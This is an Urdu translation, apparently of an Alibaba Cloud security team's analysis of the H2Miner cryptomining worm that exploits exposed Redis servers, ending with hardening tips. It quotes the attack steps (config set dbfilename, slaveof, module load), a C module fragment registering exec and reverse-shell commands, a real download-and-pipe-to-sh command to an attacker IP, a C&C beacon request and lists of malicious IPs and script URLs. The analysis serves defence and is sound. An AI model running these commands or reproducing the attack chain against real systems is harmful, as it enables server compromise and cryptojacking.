ایک دن پہلے، میرے پروجیکٹ کے سرورز میں سے ایک پر اسی طرح کے کیڑے کا حملہ ہوا تھا۔ سوال کے جواب کی تلاش میں "وہ کیا تھا؟" مجھے علی بابا کلاؤڈ سیکیورٹی ٹیم کا ایک زبردست مضمون ملا۔ چونکہ مجھے یہ مضمون Habré پر نہیں ملا، اس لیے میں نے خاص طور پر آپ کے لیے اس کا ترجمہ کرنے کا فیصلہ کیا <3
داخلہ
حال ہی میں، علی بابا کلاؤڈ کی سیکورٹی ٹیم نے H2Miner کے اچانک پھیلنے کا پتہ چلا۔ اس قسم کا نقصان دہ کیڑا Redis کے لیے اجازت کی کمی یا کمزور پاس ورڈز کو آپ کے سسٹمز کے گیٹ وے کے طور پر استعمال کرتا ہے، جس کے بعد یہ اپنے ہی نقصان دہ ماڈیول کو غلام کے ساتھ ماسٹر غلام کی مطابقت پذیری کے ذریعے ہم آہنگ کرتا ہے اور آخر کار اس نقصان دہ ماڈیول کو حملہ آور مشین میں ڈاؤن لوڈ کرتا ہے اور نقصان دہ ماڈیول کو انجام دیتا ہے۔ ہدایات
ماضی میں، آپ کے سسٹمز پر حملے بنیادی طور پر طے شدہ کاموں یا SSH کلیدوں پر مشتمل ایک طریقہ استعمال کرتے ہوئے کیے جاتے تھے جو حملہ آور کے Redis میں لاگ ان ہونے کے بعد آپ کی مشین پر لکھی جاتی تھیں۔ خوش قسمتی سے، یہ طریقہ اکثر اجازت کے کنٹرول میں مسائل کی وجہ سے یا مختلف سسٹم ورژنز کی وجہ سے استعمال نہیں کیا جا سکتا۔ تاہم، نقصان دہ ماڈیول لوڈ کرنے کا یہ طریقہ حملہ آور کے حکموں پر براہ راست عمل کر سکتا ہے یا شیل تک رسائی حاصل کر سکتا ہے، جو آپ کے سسٹم کے لیے خطرناک ہے۔
انٹرنیٹ پر ہوسٹ کیے گئے Redis سرورز کی بڑی تعداد (تقریباً 1 ملین) کی وجہ سے، علی بابا کلاؤڈ کی سیکیورٹی ٹیم، ایک دوستانہ یاد دہانی کے طور پر، صارفین کو مشورہ دیتی ہے کہ Redis کو آن لائن شیئر نہ کریں اور باقاعدگی سے اپنے پاس ورڈز کی مضبوطی کی جانچ کریں اور آیا ان سے سمجھوتہ کیا گیا ہے۔ فوری انتخاب.
H2Miner
H2Miner لینکس پر مبنی سسٹمز کے لیے ایک مائننگ بوٹ نیٹ ہے جو آپ کے سسٹم پر مختلف طریقوں سے حملہ کر سکتا ہے، بشمول Hadoop یارن، Docker، اور Redis remote command execution (RCE) کے خطرات میں اجازت کی کمی۔ ایک بوٹ نیٹ آپ کے ڈیٹا کو مائن کرنے، حملے کو افقی طور پر پھیلانے، اور کمانڈ اینڈ کنٹرول (C&C) مواصلات کو برقرار رکھنے کے لیے نقصان دہ اسکرپٹس اور میلویئر کو ڈاؤن لوڈ کرکے کام کرتا ہے۔
ریڈیس آر سی ای
اس موضوع پر علم پاول ٹوپورکوف نے ZeroNights 2018 میں شیئر کیا تھا۔ ورژن 4.0 کے بعد، Redis ایک پلگ ان لوڈنگ فیچر کو سپورٹ کرتا ہے جو صارفین کو لوڈ کرنے کی اہلیت دیتا ہے تاکہ Redis میں C کے ساتھ مرتب کردہ فائلوں کو مخصوص Redis کمانڈز پر عمل درآمد کر سکے۔ یہ فنکشن، اگرچہ مفید ہے، ایک کمزوری پر مشتمل ہے جس میں، ماسٹر سلیو موڈ میں، فائلوں کو فلری سنک موڈ کے ذریعے غلام کے ساتھ ہم آہنگ کیا جا سکتا ہے۔ یہ ایک حملہ آور کی طرف سے بدنیتی پر مبنی فائلوں کو منتقل کرنے کے لیے استعمال کیا جا سکتا ہے۔ منتقلی مکمل ہونے کے بعد، حملہ آور ماڈیول کو حملہ شدہ ریڈیس مثال پر لوڈ کرتے ہیں اور کسی بھی کمانڈ پر عمل درآمد کرتے ہیں۔
میلویئر ورم تجزیہ
حال ہی میں، علی بابا کلاؤڈ سیکیورٹی ٹیم نے دریافت کیا کہ H2Miner بدنیتی پر مبنی کان کن گروپ کا سائز اچانک ڈرامائی طور پر بڑھ گیا ہے۔ تجزیہ کے مطابق، حملے کے عام عمل مندرجہ ذیل ہے:
H2Miner مکمل حملے کے لیے RCE Redis کا استعمال کرتا ہے۔ حملہ آور پہلے غیر محفوظ ریڈیس سرورز یا کمزور پاس ورڈ والے سرورز پر حملہ کرتے ہیں۔
پھر وہ کمانڈ استعمال کرتے ہیں۔ config set dbfilename red2.so فائل کا نام تبدیل کرنے کے لیے۔ اس کے بعد حملہ آور حکم پر عمل کرتے ہیں۔ slaveof ماسٹر غلام کی نقل تیار کرنے کے میزبان ایڈریس کو سیٹ کرنے کے لیے۔
جب حملہ شدہ Redis مثال حملہ آور کی ملکیت میں ہونے والے نقصان دہ Redis کے ساتھ ماسٹر غلام کا تعلق قائم کرتا ہے، تو حملہ آور فائلوں کو سنکرونائز کرنے کے لیے fullresync کمانڈ کا استعمال کرتے ہوئے متاثرہ ماڈیول بھیجتا ہے۔ red2.so فائل کو پھر حملہ شدہ مشین پر ڈاؤن لوڈ کیا جائے گا۔ حملہ آور پھر اس so فائل کو لوڈ کرنے کے لیے ./red2.so لوڈنگ ماڈیول استعمال کرتے ہیں۔ ماڈیول حملہ آور سے کمانڈ چلا سکتا ہے یا حملہ شدہ مشین تک رسائی حاصل کرنے کے لیے ریورس کنکشن (بیک ڈور) شروع کر سکتا ہے۔
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
بدنیتی پر مبنی کمانڈ پر عمل کرنے کے بعد جیسے / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1حملہ آور بیک اپ فائل کا نام دوبارہ ترتیب دے گا اور نشانات کو صاف کرنے کے لیے سسٹم ماڈیول کو ان لوڈ کر دے گا۔ تاہم، red2.so فائل اب بھی حملہ شدہ مشین پر رہے گی۔ صارفین کو مشورہ دیا جاتا ہے کہ وہ اپنے Redis مثال کے فولڈر میں ایسی مشکوک فائل کی موجودگی پر توجہ دیں۔
وسائل کو چوری کرنے کے لیے کچھ بدنیتی پر مبنی عمل کو مارنے کے علاوہ، حملہ آور نے بدنیتی پر مبنی بائنری فائلوں کو ڈاؤن لوڈ اور عمل میں لا کر ایک بدنیتی پر مبنی اسکرپٹ کی پیروی کی۔ . اس کا مطلب ہے کہ پروسیس کا نام یا ڈائرکٹری کا نام جس میں ہوسٹ پر کنسنگ ہوتا ہے اس بات کی نشاندہی کر سکتا ہے کہ وہ مشین اس وائرس سے متاثر ہوئی ہے۔
ریورس انجینئرنگ کے نتائج کے مطابق، میلویئر بنیادی طور پر درج ذیل افعال انجام دیتا ہے:
- فائلیں اپ لوڈ کرنا اور ان پر عمل کرنا
- کان کنی
- C&C کمیونیکیشن کو برقرار رکھنا اور حملہ آور کے احکامات پر عمل درآمد کرنا
اپنے اثر و رسوخ کو بڑھانے کے لیے بیرونی سکیننگ کے لیے masscan کا استعمال کریں۔ اس کے علاوہ، پروگرام میں C&C سرور کا IP ایڈریس سخت کوڈڈ ہے، اور حملہ آور میزبان HTTP درخواستوں کا استعمال کرتے ہوئے C&C کمیونیکیشن سرور کے ساتھ بات چیت کرے گا، جہاں زومبی (سمجھوتہ شدہ سرور) کی معلومات HTTP ہیڈر میں شناخت کی جاتی ہے۔
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
حملے کے دیگر طریقے
کیڑے کے ذریعہ استعمال ہونے والے پتے اور لنکس
/ رشتہ داری
• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh
s&c
• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193
ٹپ
سب سے پہلے، Redis کو انٹرنیٹ سے قابل رسائی نہیں ہونا چاہیے اور اسے مضبوط پاس ورڈ سے محفوظ کیا جانا چاہیے۔ یہ بھی ضروری ہے کہ کلائنٹس چیک کریں کہ Redis ڈائرکٹری میں کوئی red2.so فائل نہیں ہے اور میزبان پر فائل/پروسیس کے نام میں کوئی "کنزنگ" نہیں ہے۔
ماخذ: www.habr.com